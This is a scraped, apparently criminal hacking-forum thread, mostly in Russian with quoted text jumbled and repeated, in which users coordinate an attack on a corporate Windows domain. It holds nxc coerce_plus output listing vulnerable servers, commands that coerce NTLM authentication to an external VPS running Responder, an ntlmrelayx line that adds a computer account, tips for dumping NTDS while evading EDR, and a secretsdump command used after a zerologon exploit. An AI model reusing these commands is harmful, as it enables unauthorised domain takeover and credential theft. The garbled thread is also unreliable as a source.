Да спс уже разобралсяты чекаешь политики для роли а не для группы
Да спс уже разобралсяты чекаешь политики для роли а не для группы
sudo openconnect --protocol=fortinet 218.21.165.243:443 --servercert pin-sha256:XxlB5u+vig96neVLbRHzEz2JdZAEPWS4FDTv2GLFzXU=
Session authentication will expire at Sat May 3 08:19:54 2025
[*] Nmap: SYN Stealth Scan Timing: About 1.05% done; ETC: XX:XX (7:45:43 remaining)
COERCE_PLUS 192.168.1.2 445 SBS2011 VULNERABLE, PetitPotamCOERCE_PLUS 192.168.1.3 445 SQL2008 VULNERABLE, PetitPotamCOERCE_PLUS 192.168.1.18 445 SQL01 VULNERABLE, PrinterBugCOERCE_PLUS 192.168.1.22 445 TS01 VULNERABLE, PrinterBugCOERCE_PLUS 192.168.1.21 445 NAVBC VULNERABLE, MSEvenCOERCE_PLUS 192.168.1.19 445 NAV01 VULNERABLE, PrinterBugCOERCE_PLUS 192.168.1.22 445 TS01 VULNERABLE, PrinterBugCOERCE_PLUS 192.168.1.18 445 SQL01 VULNERABLE, MSEvenCOERCE_PLUS 192.168.1.19 445 NAV01 VULNERABLE, PrinterBugCOERCE_PLUS 192.168.1.4 445 TERM2008 VULNERABLE, PrinterBugCOERCE_PLUS 192.168.1.22 445 TS01 VULNERABLE, MSEvenCOERCE_PLUS 192.168.1.4 445 TERM2008 VULNERABLE, PrinterBugCOERCE_PLUS 192.168.1.19 445 NAV01 VULNERABLE, MSEvenCOERCE_PLUS 192.168.1.20 445 EXCH01 VULNERABLE, PrinterBugCOERCE_PLUS 192.168.1.20 445 EXCH01 VULNERABLE, PrinterBugCOERCE_PLUS 192.168.1.4 445 TERM2008 VULNERABLE, MSEvenCOERCE_PLUS 192.168.1.17 445 DC01 VULNERABLE, PrinterBugCOERCE_PLUS 192.168.1.20 445 EXCH01 VULNERABLE, MSEvenCOERCE_PLUS 192.168.1.2 445 SBS2011 VULNERABLE, PrinterBugCOERCE_PLUS 192.168.1.17 445 DC01 VULNERABLE, PrinterBugCOERCE_PLUS 192.168.1.153 445 PC-BT-EB855G7 VULNERABLE, PrinterBugCOERCE_PLUS 192.168.1.3 445 SQL2008 VULNERABLE, PrinterBugCOERCE_PLUS 192.168.1.2 445 SBS2011 VULNERABLE, PrinterBugCOERCE_PLUS 192.168.1.147 445 PC-JVE-EB850G7 VULNERABLE, PrinterBugCOERCE_PLUS 192.168.1.17 445 DC01 VULNERABLE, MSEvenCOERCE_PLUS 192.168.1.153 445 PC-BT-EB855G7 VULNERABLE, MSEvenCOERCE_PLUS 192.168.1.3 445 SQL2008 VULNERABLE, MSEvenCOERCE_PLUS 192.168.1.2 445 SBS2011 VULNERABLE, MSEvenCOERCE_PLUS 192.168.1.147 445 PC-JVE-EB850G7 VULNERABLE, MSEvenCOERCE_PLUS 192.168.1.131 445 PC-JVE-EB850G7 VULNERABLE, PrinterBugCOERCE_PLUS 192.168.1.131 445 PC-JVE-EB850G7 VULNERABLE, MSEvenНет, spooler включен по дефолту в виндахЭто с nxc проблема?!
Нет, spooler включен по дефолту в виндах![]()
Аналогично, постоянно и везде видим. На сетевом устройстве уже что только не делал , выключал нат, писал новые правила фаервола, делал так чтобы юзерам выдавался айпи того же пула (не подсети даже) чтобы попробовать - 0Вся сетка уязвима к coerce. Это с nxc проблема?!
nxc smb 192.169.10.0/24 -u alex -p superpass -M coerce_plus -o LISTENER=80.66.72.19
епт=) над впс арендоватьЭххх! YoungBlood )
Делайте так, coerce_plus для того чтобы она сработала нужно статик ип (ipv4). На впн сетьях ваш локальный ип не работает, нужно внешний ип ( ип впс )
Делайте так:
Код:nxc smb 192.169.10.0/24 -u alex -p superpass -M coerce_plus -o LISTENER=80.66.72.19
На этом впсе (80.66.72.19) включите респондер вот и всё.
Такс, я с vps сделал...Эххх! YoungBlood )
Делайте так, coerce_plus для того чтобы она сработала нужно статик ип (ipv4). На впн сетьях ваш локальный ип не работает, нужно внешний ип ( ип впс )
Делайте так:
Код:nxc smb 192.169.10.0/24 -u alex -p superpass -M coerce_plus -o LISTENER=80.66.72.19
На этом впсе (80.66.72.19) включите респондер вот и всё.
apt install git python3-venv python3-pip -ygit clone https://github.com/lgandx/Responder.git~/Responder# python3 Responder.py -I enp1s0[+] Listening for events... nxc smb 192.168.1.0/24 -u "usr" -p "pwd" -M coerce_plus -o LISTENER=ip_vpsПопробуй DCSync бро.Вполне безопасный способМожет кто поделиться методом дампа нтдс удаленно, если хост защищен едром, что бы при дампе в АВ не летели Алерты
Взял на заметку эту технику. Есть крайне тупой вопрос! Ты же ловишь машинные хэши? Как потом их используешь?DOC выручил, прилетели хэшики, спасибо.
Да, как я понял только машинные учетки. А машинный пароль это просто набор символов бессмысленный = password spray использовать нельзя. Админ не может задать свой пароль для машинной тачки как я понял, иначе все сломается. Зато иногда MSSQL прилетает в cleartext пароли и их можно поспреить. В целом у меня есть заметки, если надо в лс поделюсь наработками.Взял на заметку эту технику. Есть крайне тупой вопрос! Ты же ловишь машинные хэши? Как потом их используешь?
ntlmrelayx.py -t ldaps://<DC_IP> --add-computerты ноль инфы предоставил, собирай для домена - powerview, boodhound для локали powerup, winpeas, seatbelt. Вобще не ясно что и куда ты собрался рилеить.Так друзья у меня сразу два вопроса
1. Как можно повысить привилегии в моей ситуации
2. Могу ли я провернуть NTLM RELAY.
www.netexec.wiki
А зачем устраивать этот кардебалет? Это конечно все круто но чет мне подсказывает в этой сетке есть способы передвижения и попрощеЯ же не могу из-за этого NTLM RELAY сделать и создать например учетку.
About those servers/workstations running Win7, you tried BlueKeep?So friends, I have two questions at once.
1. How can I increase privileges in my situation?
2. Can I check NTLM RELAY.
This is what I have in my hands at the moment.
vpn account in the domain I am a simple user. I am a member of the groups:
computers
- sg_data_formand_rw
- SG_SSL-VPN_USERS
- Windows SBS Link Users
- Windows SBS SharePoint_MembersGroup
- User Roles
- Windows SBS Fax Users
- Windows SBS Remote Web Access Users
Посмотреть вложение 106816
SMB 192.168.1.17 445 DC01 [*] Windows 10 / Server 2016 Build 14393 x64 (nameC01) ( signing
rue )
On DC signing is enabled, but on almost all other computers this signature is disabled. Because of this I can't make NTLM RELAY and create an account, for example.
ntlmrelayx.py -t ldaps://<DC_IP> --add-computer
Спасибо за тему.В этой теме задаем вопросы по ЛВС.
Спрашиваем про термины каторе не знаем и тд......
Постараюсь ответить.
так попробуйВсем прив! Вопрос по zerologon\secretsdump, уязвимый ДК, проэксплуатировал, пробую secretsdump.py и ошибка, впервые с такой сталкнулся, поискал, почитал в гугле, ничего толком нет, хз как исправить, если кто знает буду благодарен за помощь!
та же ошибкатак попробуй
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc domain.local/server1\$@192.168.1.5